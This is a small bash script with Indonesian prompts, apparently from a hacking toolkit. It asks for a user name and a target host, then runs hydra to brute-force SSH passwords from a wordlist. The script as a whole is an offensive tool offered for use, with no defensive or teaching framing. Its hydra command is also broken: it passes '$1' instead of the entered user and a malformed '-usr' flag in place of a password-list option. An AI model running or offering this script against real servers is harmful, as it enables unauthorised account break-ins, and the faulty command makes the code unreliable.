#!/bin/bash

clear
echo "\033[32;1m
           ..::|[ Hydra SSH BruteForce ]::..
\033[0m"

echo "













"
echo -n "\n\033[31;1mMasukan User : \033[0m"
read usr
echo -n "\n\033[32;1mMasukan Server ( ip atau host ): \033[0m"
read ip
clear
echo "

"
echo "\n\033[31;1mUser :\033[0m \033[37;1m$usr\033[0m "
echo "\n\033[31;1mHost atau Ip :\033[0m \033[37;1m$ip\033[0m"

echo "

"
hydra -l $1 -usr ../wodlis/passwords.lst $ip ssh

echo "
=> Tekan \033[33mB\033[0m untuk kembali
=> Tekan \033[31mK\033[0m untuk keluar"
echo -n "=> Pilihan: "
read peler
if [ $peler = b ] || [ $peler = B ]
then
clear
sh start
fi

if [ $peler = k ] || [ $peler = K ]
then
clear
sh exit
fi
